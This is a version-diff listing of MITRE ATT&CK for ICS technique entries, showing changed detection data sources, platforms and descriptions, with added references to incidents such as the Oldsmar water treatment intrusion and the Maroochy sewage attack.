iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsField Controller/RTU/PLC/IED
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_platformsWindows

[T0849] Masquerading

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 16:35:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]File MonitoringCommand: Command Execution
x_mitre_data_sources[1]Process monitoringFile: File Metadata
x_mitre_data_sources[2]Binary file metadataFile: File Modification
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesScheduled Job: Scheduled Job Metadata
x_mitre_data_sourcesScheduled Job: Scheduled Job Modification
x_mitre_data_sourcesService: Service Creation
x_mitre_data_sourcesService: Service Metadata

[T0838] Modify Alarm Settings

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Sequential event recorderNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Controller parametersApplication Log: Application Log Content
x_mitre_data_sources[2]Network protocol analysisOperational Databases: Process History/Live Data
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsDevice Configuration/Parameters
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0821] Modify Controller Tasking

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 11:15:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Sequential event recorderFile: File Modification
x_mitre_data_sources[1]Controller programAsset: Software/Firmware
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork protocol analysis
x_mitre_data_sourcesPacket capture

[T0836] Modify Parameter

Current version: 0.0


Old Description
New Description
t1Adversaries may modify parameters used to instruct industriat1Adversaries may modify parameters used to instruct industria
>l control system devices. These devices operate via programs>l control system devices. These devices operate via programs
> that dictate how and when to perform actions based on such > that dictate how and when to perform actions based on such 
>parameters. Such parameters can determine the extent to whic>parameters. Such parameters can determine the extent to whic
>h an action is performed and may specify additional options.>h an action is performed and may specify additional options.
> For example, a program on a control system device dictating> For example, a program on a control system device dictating
> motor processes may take a parameter defining the total num> motor processes may take a parameter defining the total num
>ber of seconds to run that motor.      An adversary can pote>ber of seconds to run that motor.      An adversary can pote
>ntially modify these parameters to produce an outcome outsid>ntially modify these parameters to produce an outcome outsid
>e of what was intended by the operators. By modifying system>e of what was intended by the operators. By modifying system
> and process critical parameters, the adversary may cause Im> and process critical parameters, the adversary may cause Im
>pact to equipment and/or control processes. Modified paramet>pact to equipment and/or control processes. Modified paramet
>ers may be turned into dangerous, out-of-bounds, or unexpect>ers may be turned into dangerous, out-of-bounds, or unexpect
>ed values from typical operations. For example, specifying t>ed values from typical operations. For example, specifying t
>hat a process run for more or less time than it should, or d>hat a process run for more or less time than it should, or d
>ictating an unusually high, low, or invalid value as a param>ictating an unusually high, low, or invalid value as a param
>eter.   In the Maroochy Attack, Vitek Boden gained remote co>eter.   In the Maroochy Attack, Vitek Boden gained remote co
>mputer access to the control system and altered data so that>mputer access to the control system and altered data so that
> whatever function should have occurred at affected pumping > whatever function should have occurred at affected pumping 
>stations did not occur or occurred in a different way. The s>stations did not occur or occurred in a different way. The s
>oftware program installed in the laptop was one developed by>oftware program installed in the laptop was one developed by
> Hunter Watertech for its use in changing configurations in > Hunter Watertech for its use in changing configurations in 
>the PDS computers. This ultimately led to 800,000 liters of >the PDS computers. This ultimately led to 800,000 liters of 
>raw sewage being spilled out into the community. (Citation: >raw sewage being spilled out into the community. (Citation: 
>Maroochy - MITRE - 200808)>Maroochy - MITRE - 200808) In the Oldsmar water treatment at
 >tack, adversaries raised the sodium hydroxide setpoint value
 > from 100 part-per-million (ppm) to 11,100 ppm, far beyond n
 >ormal operating levels. (Citation: Oldsmar Water Treatment A
 >ttack Feb 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-14 15:25:32.143000+00:00
descriptionAdversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause Impact to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808)Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause Impact to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808) In the Oldsmar water treatment attack, adversaries raised the sodium hydroxide setpoint value from 100 part-per-million (ppm) to 11,100 ppm, far beyond normal operating levels. (Citation: Oldsmar Water Treatment Attack Feb 2021)
x_mitre_data_sources[0]Sequential event recorderNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network protocol analysisApplication Log: Application Log Content
x_mitre_data_sources[2]Packet captureOperational Databases: Device Alarm
x_mitre_data_sources[3]Application logsAsset: Device Configuration/Parameters
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Oldsmar Water Treatment Attack Feb 2021', 'description': 'Pinellas County Sheriff’s Office. (2021, February 8). Treatment Plant Intrusion Press Conference. Retrieved October 8, 2021.', 'url': 'https://www.youtube.com/watch?v=MkXDSOgLQ6M'}

[T0889] Modify Program

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 11:15:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Sequential event recorderFile: File Modification
x_mitre_data_sources[1]Controller programAsset: Software/Firmware
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork protocol analysis
x_mitre_data_sourcesPacket capture

[T0839] Module Firmware

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Sequential event recorderFirmware: Firmware Modification
x_mitre_data_sources[1]Network protocol analysisNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Packet captureNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesDigital signatures

[T0801] Monitor Process State

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Controller programNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork device logs
x_mitre_data_sourcesProcess monitoring
x_mitre_data_sourcesNetflow/Enclave netflow
x_mitre_data_sourcesHost network interfaces

[T0834] Native API

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 13:47:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]API monitoringProcess: OS API Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess monitoring
x_mitre_data_sourcesSystem calls

[T0840] Network Connection Enumeration

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Process monitoringCommand: Command Execution
x_mitre_data_sources[1]API monitoringProcess: OS API Execution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T0842] Network Sniffing

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Network device logsCommand: Command Execution
x_mitre_data_sources[1]Process monitoringProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetflow/Enclave netflow
x_mitre_data_sourcesHost network interfaces

[T0861] Point & Tag Identification

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Network protocol analysisNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture
x_mitre_data_sourcesNetflow/Enclave netflow

[T0843] Program Download

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 12:52:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Sequential event recorderNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Controller programApplication Log: Application Log Content
x_mitre_data_sources[2]Network protocol analysisOperational Databases: Device Alarm
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0845] Program Upload

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-13 15:07:32.143000+00:00
x_mitre_data_sources[0]Sequential event recorderApplication Log: Application Log Content
x_mitre_data_sources[1]Controller programNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork protocol analysis
x_mitre_data_sourcesPacket capture

[T0873] Project File Infection

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]File monitoringFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesDigital signatures

[T0886] Remote Services

Current version: 0.0


Old Description
New Description
t1Adversaries may leverage remote services to move between asst1Adversaries may leverage remote services to move between ass
>ets and network segments. These services are often used to a>ets and network segments. These services are often used to a
>llow operators to interact with systems remotely within the >llow operators to interact with systems remotely within the 
>network, some examples are RDP, SMB, SSH, and other similar >network, some examples are RDP, SMB, SSH, and other similar 
>mechanisms. Remote services could be used to support remote >mechanisms. Remote services could be used to support remote 
>access, data transmission, authentication, name resolution, >access, data transmission, authentication, name resolution, 
>and other remote functions. Further, remote services may be >and other remote functions. Further, remote services may be 
>necessary to allow operators and administrators to configure>necessary to allow operators and administrators to configure
> systems within the network from their engineering or manage> systems within the network from their engineering or manage
>ment workstations. An adversary may use this technique to ac>ment workstations. An adversary may use this technique to ac
>cess devices which may be dual-homed to multiple network seg>cess devices which may be dual-homed to multiple network seg
>ments, and can be used for Program Download or to execute at>ments, and can be used for Program Download or to execute at
>tacks on control devices directly through Valid Accounts. Sp>tacks on control devices directly through Valid Accounts. Sp
>ecific remote services (RDP & VNC) may be a precursor to ena>ecific remote services (RDP & VNC) may be a precursor to ena
>ble Graphical User Interface execution on devices such as HM>ble Graphical User Interface execution on devices such as HM
>Is or engineering workstation software.>Is or engineering workstation software. In the Oldsmar water
 > treatment attack, adversaries gained access to the system t
 >hrough remote access software, allowing for the use of the s
 >tandard operator HMI interface.(Citation: Oldsmar Water Trea
 >tment Attack Feb 2021) Based on incident data, CISA and FBI 
 >assessed that Chinese state-sponsored actors also compromise
 >d various authorized remote access channels, including syste
 >ms designed to transfer data and/or allow access between cor
 >porate and ICS networks.(Citation: CISA Chinese Gas Pipeline
 > Intrusion 2011 - 2013 July 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 19:26:26.506000+00:002021-10-08 15:25:32.143000+00:00
descriptionAdversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. Remote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed to multiple network segments, and can be used for Program Download or to execute attacks on control devices directly through Valid Accounts. Specific remote services (RDP & VNC) may be a precursor to enable Graphical User Interface execution on devices such as HMIs or engineering workstation software.Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. Remote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed to multiple network segments, and can be used for Program Download or to execute attacks on control devices directly through Valid Accounts. Specific remote services (RDP & VNC) may be a precursor to enable Graphical User Interface execution on devices such as HMIs or engineering workstation software. In the Oldsmar water treatment attack, adversaries gained access to the system through remote access software, allowing for the use of the standard operator HMI interface.(Citation: Oldsmar Water Treatment Attack Feb 2021) Based on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks.(Citation: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)
x_mitre_data_sources[0]Windows event logsCommand: Command Execution
x_mitre_data_sources[1]Authentication logsLogon Session: Logon Session Creation
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Oldsmar Water Treatment Attack Feb 2021', 'description': 'Pinellas County Sheriff’s Office. (2021, February 8). Treatment Plant Intrusion Press Conference. Retrieved October 8, 2021.', 'url': 'https://www.youtube.com/watch?v=MkXDSOgLQ6M'}
external_references{'source_name': 'CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021', 'description': 'ONG2011 - DHS Advisory - Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA). (2021, July 20). Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013. Retrieved October 8, 2021.', 'url': 'https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf'}
x_mitre_data_sourcesNetwork Share: Network Share Access
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_platformsWindows

[T0846] Remote System Discovery

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Process monitoringCommand: Command Execution
x_mitre_data_sources[1]Process use of networkFile: File Access
x_mitre_data_sources[2]Process command-line parametersNetwork Traffic: Network Connection Creation
x_mitre_data_sources[3]Network protocol analysisProcess: Process Creation

[T0888] Remote System Information Discovery

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 12:45:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Network protocol analysisNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Packet captureApplication Log: Application Log Content

[T0847] Replication Through Removable Media

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]File monitoringDrive: Drive Creation
x_mitre_data_sources[1]Data loss preventionFile: File Access
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation
x_mitre_data_sourcesProcess: Process Creation

[T0848] Rogue Master

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 19:26:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Sequential event recorderNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Asset managementNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Network protocol analysisApplication Log: Application Log Content
x_mitre_data_sources[3]Packet captureOperational Databases: Process/Event Alarm

[T0851] Rootkit

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Controller programDrive: Drive Modification
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFirmware: Firmware Modification
x_mitre_data_sourcesModule: Module Load

[T0852] Screen Capture

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]API monitoringCommand: Command Execution
x_mitre_data_sources[1]Process monitoringProcess: OS API Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile monitoring

[T0853] Scripting

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]File monitoringCommand: Command Execution
x_mitre_data_sources[1]Process command-line parametersModule: Module Load
x_mitre_data_sources[2]Process monitoringProcess: Process Creation
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesScript: Script Execution

[T0881] Service Stop

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 16:23:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Process command-line parametersCommand: Command Execution
x_mitre_data_sources[1]Process monitoringFile: File Modification
x_mitre_data_sources[2]API monitoringProcess: OS API Execution
x_mitre_data_sources[3]Windows RegistryProcess: Process Creation
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Termination
x_mitre_data_sourcesService: Service Metadata
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_platformsWindows

[T0865] Spearphishing Attachment

Current version: 0.0


Old Description
New Description
t1Adversaries may use a spearphishing attachment, a variant oft1Adversaries may use a spearphishing attachment, a variant of
> spearphishing, as a form of a social engineering attack aga> spearphishing, as a form of a social engineering attack aga
>inst specific targets. Spearphishing attachments are differe>inst specific targets. Spearphishing attachments are differe
>nt from other forms of spearphishing in that they employ mal>nt from other forms of spearphishing in that they employ mal
>ware attached to an email. All forms of spearphishing are el>ware attached to an email. All forms of spearphishing are el
>ectronically delivered and target a specific individual, com>ectronically delivered and target a specific individual, com
>pany, or industry. In this scenario, adversaries attach a fi>pany, or industry. In this scenario, adversaries attach a fi
>le to the spearphishing email and usually rely upon User Exe>le to the spearphishing email and usually rely upon User Exe
>cution to gain execution and access. (Citation: EAttack Spea>cution to gain execution and access. (Citation: EAttack Spea
>rphishing Attachment)>rphishing Attachment) A Chinese spearphishing campaign runni
 >ng from December 9, 2011 through February 29, 2012, targeted
 > ONG organizations and their employees. The emails were cons
 >tructed with a high level of sophistication to convince empl
 >oyees to open the malicious file attachments.(Citation: CISA
 > Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
descriptionAdversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution and access. (Citation: EAttack Spearphishing Attachment)Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution and access. (Citation: EAttack Spearphishing Attachment) A Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments.(Citation: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)
x_mitre_data_sources[0]File monitoringApplication Log: Application Log Content
x_mitre_data_sources[1]Packet captureNetwork Traffic: Network Traffic Content
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021', 'description': 'ONG2011 - DHS Advisory - Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA). (2021, July 20). Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013. Retrieved October 8, 2021.', 'url': 'https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf'}
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork intrusion detection system
x_mitre_data_sourcesDetonation chamber
x_mitre_data_sourcesEmail gateway
x_mitre_data_sourcesMail server

[T0856] Spoof Reporting Message

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Alarm HistoryNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network protocol analysisApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0869] Standard Application Layer Protocol

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Process use of networkNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Malware reverse engineeringNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess monitoring
x_mitre_data_sourcesNetwork protocol analysis
x_mitre_data_sourcesPacket capture

[T0862] Supply Chain Compromise

Current version: 0.0

Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sources['Web proxy', 'File monitoring', 'Detonation chamber', 'Digital signatures']
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 12:19:26.506000+00:002021-10-11 16:22:12.527000+00:00

[T0857] System Firmware

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Alarm historyFirmware: Firmware Modification
x_mitre_data_sources[1]Sequential event recorderNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Network protocol analysisNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0882] Theft of Operational Information

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-11 16:22:12.527000+00:00
x_mitre_platforms[0]WindowsNone

[T0855] Unauthorized Command Message

Current version: 0.0


Old Description
New Description
t1Adversaries may send unauthorized command messages to instrut1Adversaries may send unauthorized command messages to instru
>ct control system assets to perform actions outside of their>ct control system assets to perform actions outside of their
> intended functionality, or without the logical precondition> intended functionality, or without the logical precondition
>s to trigger their expected function. Command messages are u>s to trigger their expected function. Command messages are u
>sed in ICS networks to give direct instructions to control s>sed in ICS networks to give direct instructions to control s
>ystems devices. If an adversary can send an unauthorized com>ystems devices. If an adversary can send an unauthorized com
>mand message to a control system, then it can instruct the c>mand message to a control system, then it can instruct the c
>ontrol systems device to perform an action outside the norma>ontrol systems device to perform an action outside the norma
>l bounds of the device's actions. An adversary could potenti>l bounds of the device's actions. An adversary could potenti
>ally instruct a control systems device to perform an action >ally instruct a control systems device to perform an action 
>that will cause an Impact. In the Maroochy Attack, the adver>that will cause an Impact. (Citation: Research - Research - 
>sary used a dedicated analog two-way radio system to send fa>Taxonomy Cyber Attacks on SCADA) In the Maroochy Attack, the
>lse data and instructions to pumping stations and the centra> adversary used a dedicated analog two-way radio system to s
>l computer. In the Dallas Siren incident, adversaries were a>end false data and instructions to pumping stations and the 
>ble to send command messages to activate tornado alarm syste>central computer. (Citation: Maroochy - MITRE - 200808) In t
>ms across the city without an impending tornado or other dis>he Dallas Siren incident, adversaries were able to send comm
>aster. Alarms were activated more than a dozen times. These >and messages to activate tornado alarm systems across the ci
>disruptions occurred once in 2017, and later in a nearby cou>ty without an impending tornado or other disaster. (Citation
>nty in 2019.>:ZDNet Dallas April 2017) (Citation:StateScoop Dallas March 
 >2019)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 09:28:26.506000+00:002021-10-08 15:25:32.143000+00:00
descriptionAdversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an Impact. In the Maroochy Attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer. In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. Alarms were activated more than a dozen times. These disruptions occurred once in 2017, and later in a nearby county in 2019.Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an Impact. (Citation: Research - Research - Taxonomy Cyber Attacks on SCADA) In the Maroochy Attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer. (Citation: Maroochy - MITRE - 200808) In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation:ZDNet Dallas April 2017) (Citation:StateScoop Dallas March 2019)
x_mitre_data_sources[0]Alarm historyNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Sequential event recorderApplication Log: Application Log Content
x_mitre_data_sources[2]Netflow/Enclave netflowOperational Databases: Process History/Live Data
x_mitre_data_sources[3]Packet captureOperational Databases: Process/Event Alarm
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork protocol analysis

[T0863] User Execution

Current version: 0.0


Old Description
New Description
t1Adversaries may rely on a targeted organizations’ user intert1Adversaries may rely on a targeted organizations' user inter
>action for the execution of malicious code. User interaction>action for the execution of malicious code. User interaction
> may consist of installing applications, opening email attac> may consist of installing applications, opening email attac
>hments, or granting higher permissions to documents.   Adver>hments, or granting higher permissions to documents.   Adver
>saries may embed malicious code or visual basic code into fi>saries may embed malicious code or visual basic code into fi
>les such as Microsoft Word and Excel documents or software i>les such as Microsoft Word and Excel documents or software i
>nstallers. (Citation: BlackEnergy - Booz Allen Hamilton) Exe>nstallers. (Citation: BlackEnergy - Booz Allen Hamilton) Exe
>cution of this code requires that the user enable scripting >cution of this code requires that the user enable scripting 
>or write access within the document. Embedded code may not a>or write access within the document. Embedded code may not a
>lways be noticeable to the user especially in cases of troja>lways be noticeable to the user especially in cases of troja
>nized software. (Citation: Havex - F-Secure)>nized software. (Citation: Havex - F-Secure) A Chinese spear
 >phishing campaign running from December 9, 2011 through Febr
 >uary 29, 2012 delivered malware through spearphishing attach
 >ments which required user action to achieve execution.(Citat
 >ion: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 20
 >21)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
descriptionAdversaries may rely on a targeted organizations’ user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. Adversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: BlackEnergy - Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Havex - F-Secure)Adversaries may rely on a targeted organizations' user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. Adversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: BlackEnergy - Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Havex - F-Secure) A Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution.(Citation: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)
x_mitre_data_sources[0]Anti-virusApplication Log: Application Log Content
x_mitre_data_sources[1]Process command-line parametersCommand: Command Execution
x_mitre_data_sources[2]Process monitoringFile: File Creation
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021', 'description': 'ONG2011 - DHS Advisory - Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA). (2021, July 20). Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013. Retrieved October 8, 2021.', 'url': 'https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf'}
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
